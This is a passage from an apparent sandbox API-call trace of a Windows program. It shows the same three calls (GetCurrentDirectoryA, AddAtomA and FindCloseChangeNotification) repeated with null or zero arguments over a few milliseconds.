lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.018] AddAtomA (lpString=0x0) returned 0x0 [0119.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.018] AddAtomA (lpString=0x0) returned 0x0 [0119.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.018] AddAtomA (lpString=0x0) returned 0x0 [0119.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.018] AddAtomA (lpString=0x0) returned 0x0 [0119.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.018] AddAtomA (lpString=0x0) returned 0x0 [0119.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.018] AddAtomA (lpString=0x0) returned 0x0 [0119.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.018] AddAtomA (lpString=0x0) returned 0x0 [0119.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.018] AddAtomA (lpString=0x0) returned 0x0 [0119.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.019] AddAtomA (lpString=0x0) returned 0x0 [0119.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.019] AddAtomA (lpString=0x0) returned 0x0 [0119.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.019] AddAtomA (lpString=0x0) returned 0x0 [0119.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.019] AddAtomA (lpString=0x0) returned 0x0 [0119.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.019] AddAtomA (lpString=0x0) returned 0x0 [0119.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.019] AddAtomA (lpString=0x0) returned 0x0 [0119.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.019] AddAtomA (lpString=0x0) returned 0x0 [0119.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.019] AddAtomA (lpString=0x0) returned 0x0 [0119.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.019] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.020] AddAtomA (lpString=0x0) returned 0x0 [0119.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.021] AddAtomA (lpString=0x0) returned 0x0 [0119.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.022] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.023] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.023] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.023] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.023] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.023] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.023] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.023] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.023] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.023] AddAtomA (lpString=0x0) returned 0x0 [0119.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.024] AddAtomA (lpString=0x0) returned 0x0 [0119.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.024] AddAtomA (lpString=0x0) returned 0x0 [0119.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.024] AddAtomA (lpString=0x0) returned 0x0 [0119.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.024] AddAtomA (lpString=0x0) returned 0x0 [0119.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.024] AddAtomA (lpString=0x0) returned 0x0 [0119.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.024] AddAtomA (lpString=0x0) returned 0x0 [0119.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.024] AddAtomA (lpString=0x0) returned 0x0 [0119.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.024] AddAtomA (lpString=0x0) returned 0x0 [0119.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.025] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.026] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.026] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.026] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.026] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.026] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.026] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.026] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.026] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.026] AddAtomA (lpString=0x0) returned 0x0 [0119.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.027] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.028] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: 